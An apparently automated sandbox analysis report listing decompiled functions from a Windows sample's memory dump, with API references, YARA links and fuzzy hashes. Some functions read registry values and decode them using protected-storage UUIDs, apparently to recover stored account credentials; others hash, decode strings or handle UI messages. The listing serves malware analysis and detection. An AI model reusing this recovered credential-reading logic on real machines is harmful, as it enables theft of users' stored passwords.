                                                  Uniqueness Score: -1.00%

                                                  Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                  0x0040edb3
                                                  0x0040edba
                                                  0x0040edc2
                                                  0x0040edc7
                                                  0x0040edcf
                                                  0x0040edd5
                                                  0x00000000
                                                  0x0040edd5
                                                  0x0040edc7
                                                  0x0040edda

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                  • API String ID: 2574300362-543337301
                                                  • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                  • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                  • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                  • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                  0x0040fe05
                                                  0x0040fe0d
                                                  0x0040fe13
                                                  0x0040fe18
                                                  0x0040fe1a
                                                  0x0040fe25
                                                  0x0040fe2e
                                                  0x0040fe27
                                                  0x0040fe27
                                                  0x0040fe27
                                                  0x0040fe30
                                                  0x0040fe32
                                                  0x0040fe38
                                                  0x0040fe40
                                                  0x0040fe49
                                                  0x0040fe42
                                                  0x0040fe42
                                                  0x0040fe42
                                                  0x0040fe4b
                                                  0x0040fe4d
                                                  0x0040fe53
                                                  0x0040fe60
                                                  0x0040fe72
                                                  0x0040fe62
                                                  0x0040fe62
                                                  0x0040fe65
                                                  0x0040fe67
                                                  0x0040fe6a
                                                  0x0040fe6d
                                                  0x0040fe6d
                                                  0x0040fe74
                                                  0x0040fe76
                                                  0x0040fe7c
                                                  0x0040fe84
                                                  0x0040fe96
                                                  0x0040fe86
                                                  0x0040fe86
                                                  0x0040fe89
                                                  0x0040fe8b
                                                  0x0040fe8e
                                                  0x0040fe91
                                                  0x0040fe91
                                                  0x0040fe98
                                                  0x0040fe9a
                                                  0x0040fea0
                                                  0x0040fea8
                                                  0x0040feba
                                                  0x0040feaa
                                                  0x0040feaa
                                                  0x0040fead
                                                  0x0040feaf
                                                  0x0040feb2
                                                  0x0040feb5
                                                  0x0040feb5
                                                  0x0040fec2
                                                  0x0040fecd
                                                  0x0040fed6
                                                  0x0040fedd
                                                  0x0040fee0
                                                  0x0040fee3
                                                  0x0040fee6
                                                  0x0040feec

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                  • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                  • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                  • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                  0x0040bd0b
                                                  0x0040bd13
                                                  0x0040bd14
                                                  0x0040bd16
                                                  0x0040bd1a
                                                  0x0040bd1d
                                                  0x0040bd1f
                                                  0x0040bd23
                                                  0x0040bd52
                                                  0x0040bd25
                                                  0x0040bd2a
                                                  0x0040bd2f
                                                  0x0040bd36
                                                  0x0040bd40
                                                  0x0040bd48
                                                  0x0040bd5d
                                                  0x0040bd63
                                                  0x0040bd6b
                                                  0x0040bd77
                                                  0x0040bd89

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                  • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                  • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                  • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                  0x0040247a
                                                  0x0040247f
                                                  0x00402481
                                                  0x00402490
                                                  0x0040249b
                                                  0x004024a0
                                                  0x004024a5
                                                  0x004024b0
                                                  0x004024b7
                                                  0x004024be
                                                  0x004024c5
                                                  0x004024cc
                                                  0x0040259e
                                                  0x004025ad
                                                  0x004025b5
                                                  0x004025d1
                                                  0x004025e4
                                                  0x004025ee
                                                  0x004025ee
                                                  0x004025d1
                                                  0x004024d2
                                                  0x004024d8
                                                  0x004024dd
                                                  0x00402546
                                                  0x004024df
                                                  0x004024ed
                                                  0x004024f5
                                                  0x004024fa
                                                  0x00402510
                                                  0x00402517
                                                  0x0040252c
                                                  0x0040252c
                                                  0x0040254b
                                                  0x0040254b
                                                  0x0040254d
                                                  0x00402552
                                                  0x00402575
                                                  0x0040257d
                                                  0x0040258f
                                                  0x00402594
                                                  0x0040257d
                                                  0x00402552
                                                  0x004024cc
                                                  0x00402603

                                                  APIs
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                  • memset.MSVCRT ref: 004024F5
                                                    • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                    • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                    • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                    • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                  • LocalFree.KERNEL32(?), ref: 004025EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                  • String ID:
                                                  • API String ID: 3503910906-0
                                                  • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                  • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                  • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                  • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B3C4, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E00401000(_t61,  &_v264, 0x412440);
					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                  0x0040b3c4
                                                  0x0040b3ce
                                                  0x0040b3da
                                                  0x0040b3dc
                                                  0x0040b3df
                                                  0x0040b3ef
                                                  0x0040b3f4
                                                  0x0040b3fe
                                                  0x0040b3fe
                                                  0x0040b40b
                                                  0x0040b427
                                                  0x0040b42e
                                                  0x0040b43e
                                                  0x0040b44f
                                                  0x0040b454
                                                  0x0040b457
                                                  0x0040b45a
                                                  0x0040b463
                                                  0x0040b472
                                                  0x0040b47a
                                                  0x0040b48c
                                                  0x0040b492
                                                  0x0040b492
                                                  0x0040b47a
                                                  0x0040b49c
                                                  0x0040b539
                                                  0x0040b539
                                                  0x0040b4a2
                                                  0x0040b4a2
                                                  0x0040b4a6
                                                  0x0040b4aa
                                                  0x0040b4af
                                                  0x0040b4af
                                                  0x0040b4b5
                                                  0x0040b4c1
                                                  0x0040b4c6
                                                  0x0040b4c6
                                                  0x0040b4cc
                                                  0x00000000
                                                  0x0040b4ce
                                                  0x0040b4da
                                                  0x0040b4f4
                                                  0x0040b4f5
                                                  0x0040b4f5
                                                  0x0040b4f7
                                                  0x0040b4fe
                                                  0x0040b4fe
                                                  0x0040b500
                                                  0x0040b50c
                                                  0x0040b50c
                                                  0x0040b50c
                                                  0x0040b50e
                                                  0x0040b510
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b512
                                                  0x0040b51a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b529
                                                  0x00000000
                                                  0x0040b52f
                                                  0x0040b502
                                                  0x0040b505
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b507
                                                  0x0040b509
                                                  0x00000000
                                                  0x0040b509
                                                  0x0040b4f9
                                                  0x0040b4fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040b4fc
                                                  0x0040b4e9
                                                  0x0040b4eb
                                                  0x00000000
                                                  0x0040b4eb
                                                  0x0040b4cc

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B42E
                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B472
                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                  • PostMessageA.USER32 ref: 0040B52F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$MenuPostSendStringmemset
                                                  • String ID:
                                                  • API String ID: 3798638045-0
                                                  • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                  • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                  • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                  • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                  0x0040a120
                                                  0x0040a122
                                                  0x0040a127
                                                  0x0040a129
                                                  0x0040a12c
                                                  0x0040a12c
                                                  0x0040a136
                                                  0x00000000
                                                  0x00000000
                                                  0x0040a138
                                                  0x0040a13c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040a148
                                                  0x00000000
                                                  0x00000000
                                                  0x0040a14d
                                                  0x0040a155
                                                  0x0040a176
                                                  0x0040a176
                                                  0x0040a257
                                                  0x0040a25c
                                                  0x0040a25e
                                                  0x0040a25e
                                                  0x0040a26b
                                                  0x0040a26e
                                                  0x0040a274
                                                  0x0040a27c
                                                  0x0040a27c
                                                  0x0040a17f
                                                  0x0040a181
                                                  0x0040a188
                                                  0x0040a18b
                                                  0x0040a18e
                                                  0x0040a1f2
                                                  0x0040a1f2
                                                  0x0040a1f4
                                                  0x0040a1fa
                                                  0x0040a1fd
                                                  0x0040a255
                                                  0x00000000
                                                  0x0040a256
                                                  0x0040a1ff
                                                  0x0040a1ff
                                                  0x0040a201
                                                  0x0040a21f
                                                  0x0040a224
                                                  0x0040a229
                                                  0x0040a22f
                                                  0x0040a235
                                                  0x0040a23e
                                                  0x00000000
                                                  0x0040a23e
                                                  0x0040a231
                                                  0x0040a233
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040a241
                                                  0x0040a241
                                                  0x0040a247
                                                  0x0040a24a
                                                  0x0040a24d
                                                  0x0040a24d
                                                  0x00000000
                                                  0x0040a201
                                                  0x0040a190
                                                  0x0040a190
                                                  0x0040a192
                                                  0x0040a198
                                                  0x0040a19c
                                                  0x0040a19f
                                                  0x0040a1a0
                                                  0x0040a1a5
                                                  0x0040a1a8
                                                  0x0040a1ae
                                                  0x0040a1b2
                                                  0x0040a1b3
                                                  0x0040a1b8
                                                  0x0040a1bb
                                                  0x0040a1bf
                                                  0x0040a1c5
                                                  0x0040a1ce
                                                  0x0040a1d1
                                                  0x00000000
                                                  0x0040a1d1
                                                  0x0040a1c1
                                                  0x0040a1c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040a1d8
                                                  0x0040a1d8
                                                  0x0040a1de
                                                  0x0040a1e1
                                                  0x0040a1e4
                                                  0x0040a1e4
                                                  0x0040a1ec
                                                  0x0040a1f0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                    • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                  • strlen.MSVCRT ref: 0040A13F
                                                  • atoi.MSVCRT ref: 0040A14D
                                                  • _mbsicmp.MSVCRT ref: 0040A1A0
                                                  • _mbsicmp.MSVCRT ref: 0040A1B3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                  • String ID:
                                                  • API String ID: 4107816708-0
                                                  • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                  • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                  • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                  • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
